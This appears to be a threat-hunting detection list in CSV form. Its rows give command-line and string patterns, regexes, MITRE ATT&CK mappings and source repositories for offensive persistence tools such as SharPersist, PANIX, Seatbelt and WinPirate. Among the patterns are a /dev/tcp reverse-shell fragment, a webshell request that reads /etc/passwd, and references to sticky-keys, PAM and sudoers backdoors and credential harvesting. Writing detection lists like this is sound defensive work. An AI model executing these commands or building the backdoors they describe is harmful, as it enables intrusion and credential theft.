"* stealthily grabs  passwords and browser history from windows systems*",".{0,1000}\sstealthily\sgrabs\s\spasswords\sand\sbrowser\shistory\sfrom\swindows\ssystems.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"* stickykey.ps1*",".{0,1000}\sstickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"* Stickykeys.sh*",".{0,1000}\sStickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"* --sudoers-backdoor*",".{0,1000}\s\-\-sudoers\-backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* -t schtaskbackdoor *",".{0,1000}\s\-t\sschtaskbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"* Use-Waitfor.exe*",".{0,1000}\sUse\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"* Waitfor-Persistence.ps1*",".{0,1000}\sWaitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"* WinPirate.bat*",".{0,1000}\sWinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"* XRulez.cpp*",".{0,1000}\sXRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*""NSA0XF$""*",".{0,1000}\""NSA0XF\$\"".{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*""small web shell by zaco*",".{0,1000}\""small\sweb\sshell\sby\szaco.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*""WorkstationName"">RULER</Data>*",".{0,1000}\""WorkstationName\""\>RULER\<\/Data\>.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*# If got a malicious packet - Activate the backdoor!*",".{0,1000}\#\sIf\sgot\sa\smalicious\spacket\s\-\sActivate\sthe\sbackdoor!.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*# Pop up the calculator when you start excel.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\sexcel\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*# Pop up the calculator when you start powerpoint.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\spowerpoint\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*# Pop up the calculator when you start winword.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\swinword\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*# Sticky Keys backdoor exists*",".{0,1000}\#\sSticky\sKeys\sbackdoor\sexists.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*#!/bin/bash\n/bin/bash -c 'sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}\#!\/bin\/bash\\n\/bin\/bash\s\-c\s\'sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*$calcwllx64 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4*",".{0,1000}\$calcwllx64\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*$calcwllx86 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4*",".{0,1000}\$calcwllx86\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*%APPDATA%/Indexing.*",".{0,1000}\%APPDATA\%\/Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*./backdoor.sh *",".{0,1000}\.\/backdoor\.sh\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","320","83","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*./dropbear *",".{0,1000}\.\/dropbear\s.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*./dynasty.sh*",".{0,1000}\.\/dynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*.bashrc persistence setup successfully*",".{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*.exe  -group=remote -computername=*",".{0,1000}\.exe\s\s\-group\=remote\s\-computername\=.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe /method:create /taskname:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}\s\/trigger\:.{0,1000}\s\/modifier\:.{0,1000}\s\/program\:.{0,1000}\s\/argument\:.{0,1000}\.dll\s\/remoteserver\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*.exe /method:delete /taskname:* /technique:hide*",".{0,1000}\.exe\s\/method\:delete\s\/taskname\:.{0,1000}\s\/technique\:hide.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*.exe /method:edit /taskname:Cleanup*",".{0,1000}\.exe\s\/method\:edit\s\/taskname\:Cleanup.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*.exe action=create * service=* displayname=* binpath=**",".{0,1000}\.exe\saction\=create\s.{0,1000}\sservice\=.{0,1000}\sdisplayname\=.{0,1000}\sbinpath\=.{0,1000}.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*.exe action=GetScheduledTaskCOMHandler*",".{0,1000}\.exe\saction\=GetScheduledTaskCOMHandler.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*.exe action=ListRunningServices*",".{0,1000}\.exe\saction\=ListRunningServices.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*.exe action=ListScheduledTasks*",".{0,1000}\.exe\saction\=ListScheduledTasks.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*.exe action=ListTaskNames*",".{0,1000}\.exe\saction\=ListTaskNames.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*.exe --eventviewer *.exe*",".{0,1000}\.exe\s\-\-eventviewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.exe -group=all *",".{0,1000}\.exe\s\-group\=all\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -group=all -AuditPolicies*",".{0,1000}\.exe\s\-group\=all\s\-AuditPolicies.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -group=all -full*",".{0,1000}\.exe\s\-group\=all\s\-full.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -group=remote *",".{0,1000}\.exe\s\-group\=remote\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -group=system *",".{0,1000}\.exe\s\-group\=system\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -group=user *",".{0,1000}\.exe\s\-group\=user\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","fp risks","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe NonstandardProcesses*",".{0,1000}\.exe\sNonstandardProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe NTLMSettings*",".{0,1000}\.exe\sNTLMSettings.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe --pwsh *.ps1 *.exe*",".{0,1000}\.exe\s\-\-pwsh\s.{0,1000}\.ps1\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.exe -q InterestingProcesses*",".{0,1000}\.exe\s\-q\sInterestingProcesses.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -q PowerShell*",".{0,1000}\.exe\s\-q\sPowerShell.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe -q WindowsDefender*",".{0,1000}\.exe\s\-q\sWindowsDefender.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*.exe --schedule * *.exe*",".{0,1000}\.exe\s\-\-schedule\s.{0,1000}\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.exe --screensaver *:\*.exe*",".{0,1000}\.exe\s\-\-screensaver\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.exe Search Find-Persist*",".{0,1000}\.exe\sSearch\sFind\-Persist.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"*.exe --startup *:\*.exe*",".{0,1000}\.exe\s\-\-startup\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.exe -t keepass -f *",".{0,1000}\.exe\s\-t\skeepass\s\-f\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*.exe -t startupfolder -c * -a * -f*",".{0,1000}\.exe\s\-t\sstartupfolder\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-f.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*.exe -t tortoisesvn -c * -a * -m*",".{0,1000}\.exe\s\-t\stortoisesvn\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-m.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*.exe --winlogon * *:\*.exe*",".{0,1000}\.exe\s\-\-winlogon\s.{0,1000}\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.exe --wmi *:\*.exe*",".{0,1000}\.exe\s\-\-wmi\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*.php?cmd=cat+/etc/passwd*",".{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","#linux","N/A","10","1","N/A","N/A","N/A","N/A"
"*.sh --at --custom --command * --time *",".{0,1000}\.sh\s\-\-at\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-time\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
